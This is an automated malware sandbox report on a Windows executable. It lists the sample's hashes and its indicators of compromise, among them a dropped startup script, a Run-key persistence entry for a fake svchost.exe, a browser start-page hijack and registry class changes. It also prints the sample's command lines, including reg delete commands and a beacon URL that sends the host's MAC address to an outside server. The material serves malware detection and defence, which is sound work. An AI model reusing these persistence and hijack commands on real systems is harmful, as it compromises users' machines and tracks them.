d52fdd39989af17e464d3e854fb19a289206790efc06a0735afdc45455b48727

Analysis

max time kernel
149s
max time network
134s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02-10-2024 13:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Size

192KB
MD5

0b0169d3702e9554d7cab8ee658bc624
SHA1

448f5306ae017532b860ac848f85a6be2adb6e38
SHA256

d52fdd39989af17e464d3e854fb19a289206790efc06a0735afdc45455b48727
SHA512

5e0a1a1b6895bea87ed563eb71c6157a343359ff78cf9890249cf45ae4e178006ac864f2f1198551bd357a102bf4302e98add6b40f4af16f6742732f299e2767
SSDEEP

3072:H/na6WDmrZ5Cn79xvlr2xmOJ5wUuWXcfb0hw7IACb873684yVcx566/znTV/IEeC:H/nuDm9knmhJ4/sMLuO6/zLeEf

Score

7^/10

discovery persistence

Malware Config

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.vbs	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.vbs	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ÓÃÓÚÏµÍ³µÇÂ¼µÄÎÄ¼þ£¬É¾³ýµôÎÞ·¨Õý³£µÇÂ¼ÏµÍ³¡£ = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b88b8645d6de74ab21efaf0de98379b00000000020000000000106600000001000020000000eaec879c001392f733144734d0a6a68f81f4e07726917a17b648c8834a22c132000000000e800000000200002000000052c003856b81d46fe72b7cf7b7b0a62de5731bc2f2c947f70f759f54cb0c9e4a2000000044f8c0a3f4908ce19b77662e9e2ffcb51e680a2e538377d6ac1d71252411bdd140000000408adb4b910dc1b6d1a69a861a5d0e36c254ab411ee966341ae8e55e61a33214337360eecfb56315cd05c20d3e05ac20278284cd48c57e52427fc16a764a3878	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\SearchScopes	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 8007a725d314db01	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434039335"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4DD1D5A1-80C6-11EF-A6BB-F2DF7204BD4F} = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b88b8645d6de74ab21efaf0de98379b00000000020000000000106600000001000020000000d617c34b5ac86f209634075db68894ee73724effdab4fade3ca741f634070d45000000000e8000000002000020000000dcd8ab819b0aaa02a62ddec2568827201781345fa152752821d7bed57843eb2590000000dea4ccc22a10bb45afc4f9a6814494af08adfd9a510aed7ebd4f7e8391e407cac44c7d3bd20e8fc405227b203defd74438691b4f135fab487cb94e7832efb32c3271482478391882753b14fe37a26652d9a3c6fcc5c9d7159fc6c579a4e8b77b0ae07c6e0b666de37ad0272a4c35be687d6d1ad086a53f3648f06904f7804f3a00b1129aeb3a4a00eddea6bb706d318b400000000c64be758cc30a95e707a1fe2066d6a7106b88f79c395c3d635068e7e0c3611eb256db0021bae666e17c019a00bc47fac2681857ad1b66f685ddeebec54c6bbd	IEXPLORE.EXE

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.7400.net"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe

Modifies registry class 41 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\IE	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\shellex	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\InProcServer32\ThreadingModel = "Apartment"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\Instance\CLSID = "{3f454f0e-42ae-4d7c-8ea3-328250d6e272}"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\Instance\InitPropertyBag\command = "´ò¿ªÖ÷Ò³"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\InProcServer32	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\IE	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex	regini.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\Instance\InitPropertyBag\method = "ShellExecute"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\Instance\InitPropertyBag\Param2 = "%ProgramFiles(x86)%\\Internet Explorer\\iexplore.exe"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\ieframe	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\Instance	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\Instance\InitPropertyBag	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\Instance\InitPropertyBag\CLSID = "{13709620-C279-11CE-A49E-444553540000}"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\Instance\InitPropertyBag\Param1 = "http://%77%77%77%2e%37%34%30%30%2e%6e%65%74"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\IE	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\InProcServer32\ = "%SystemRoot%\\SysWow64\\shdocvw.dll"	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\shellex\MayChangeDefaultMenu	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\IE	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\IE	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder	regini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\IE	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{92899168-5914-4494-9289-591456437110}\shellex\MayChangeDefaultMenu\	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\"%ProgramFiles(x86)%\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046}	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2748	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2748	IEXPLORE.EXE
2748	IEXPLORE.EXE
2868	IEXPLORE.EXE
2868	IEXPLORE.EXE
2868	IEXPLORE.EXE
2868	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 3048	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	30
PID 2168 wrote to memory of 3048	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	30
PID 2168 wrote to memory of 3048	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	30
PID 2168 wrote to memory of 3048	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	30
PID 3048 wrote to memory of 2748	3048	iexplore.exe	31
PID 3048 wrote to memory of 2748	3048	iexplore.exe	31
PID 3048 wrote to memory of 2748	3048	iexplore.exe	31
PID 3048 wrote to memory of 2748	3048	iexplore.exe	31
PID 2168 wrote to memory of 2764	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	32
PID 2168 wrote to memory of 2764	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	32
PID 2168 wrote to memory of 2764	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	32
PID 2168 wrote to memory of 2764	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	32
PID 2764 wrote to memory of 2668	2764	cmd.exe	34
PID 2764 wrote to memory of 2668	2764	cmd.exe	34
PID 2764 wrote to memory of 2668	2764	cmd.exe	34
PID 2764 wrote to memory of 2668	2764	cmd.exe	34
PID 2168 wrote to memory of 2892	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	35
PID 2168 wrote to memory of 2892	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	35
PID 2168 wrote to memory of 2892	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	35
PID 2168 wrote to memory of 2892	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	35
PID 2748 wrote to memory of 2868	2748	IEXPLORE.EXE	38
PID 2748 wrote to memory of 2868	2748	IEXPLORE.EXE	38
PID 2748 wrote to memory of 2868	2748	IEXPLORE.EXE	38
PID 2748 wrote to memory of 2868	2748	IEXPLORE.EXE	38
PID 2892 wrote to memory of 2640	2892	cmd.exe	37
PID 2892 wrote to memory of 2640	2892	cmd.exe	37
PID 2892 wrote to memory of 2640	2892	cmd.exe	37
PID 2892 wrote to memory of 2640	2892	cmd.exe	37
PID 2168 wrote to memory of 2972	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	40
PID 2168 wrote to memory of 2972	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	40
PID 2168 wrote to memory of 2972	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	40
PID 2168 wrote to memory of 2972	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	40
PID 2972 wrote to memory of 364	2972	cmd.exe	42
PID 2972 wrote to memory of 364	2972	cmd.exe	42
PID 2972 wrote to memory of 364	2972	cmd.exe	42
PID 2972 wrote to memory of 364	2972	cmd.exe	42
PID 2168 wrote to memory of 2520	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	43
PID 2168 wrote to memory of 2520	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	43
PID 2168 wrote to memory of 2520	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	43
PID 2168 wrote to memory of 2520	2168	0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe	43
PID 2520 wrote to memory of 2860	2520	cmd.exe	45
PID 2520 wrote to memory of 2860	2520	cmd.exe	45
PID 2520 wrote to memory of 2860	2520	cmd.exe	45
PID 2520 wrote to memory of 2860	2520	cmd.exe	45

C:\Users\Admin\AppData\Local\Temp\0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://down.biso.cc/b/tj.asp?mac=F2:DF:72:04:BD:4F&tid=0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://down.biso.cc/b/tj.asp?mac=F2:DF:72:04:BD:4F&tid=0b0169d3702e9554d7cab8ee658bc624_JaffaCakes118
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2748 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2868
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\755222_s.ini
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\SysWOW64\regini.exe
    regini C:\Users\Admin\AppData\Local\Temp\755222_s.ini
    3⤵
    - Modifies registry class
    PID:2668
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2640
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\755222.ini
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\SysWOW64\regini.exe
    regini C:\Users\Admin\AppData\Local\Temp\755222.ini
    3⤵
    - Modifies registry class
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8286dae39e699d00affefe7dffd2bb36

SHA1
614b475f79d47586d3451d77d0b17952cdc8f850

SHA256
8cf4446baf3baecff48d381dfaec572eb135b726f5b7e1db314202c19324f5f2

SHA512
888af71d788ed32e79e0d6b5869d3071921d7f82a27136a52c81a8e88e981166f8946650539cee06b5d471cac6a99d3e9543def9de85504b799d13facb662476

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
80ff9360bdd2cdbd3257ae1e7793d028

SHA1
0336917e653f663a20867ef3cf0800d0eff9872b

SHA256
cc8d26fcf3ab9bea6aee54f36b06289c7c35147b9152d2d8468ef0e142c8372d

SHA512
48d509d3049b6939f51b2ad396d9511dcef822b68fd7bdf5088ccedc74ab02cb9a40ec4ad3206b463f856801d9ff7dc8c8de4f18aaa4eedb350375bb3a380e67

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
27515266137383dfc03209f7f8a5f823

SHA1
a6f9d649292a11b219cadecf950a53dc073c72dc

SHA256
4dceba069306cc8addd4822db716ad8ded19d678c18357cb2a7e1ee04f302204

SHA512
d03d9f28fd54ed0056b4c42639496f776577dd0b4f1d965392600845466da6ecef174983bd9d1d4ec1149415bcdea983c24639fab53be129adcf886784d188a4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7b4cbec691d269029a10bdf5b8d66ed4

SHA1
84adbd10c8f8d2e3be192023911d03e47e568f73

SHA256
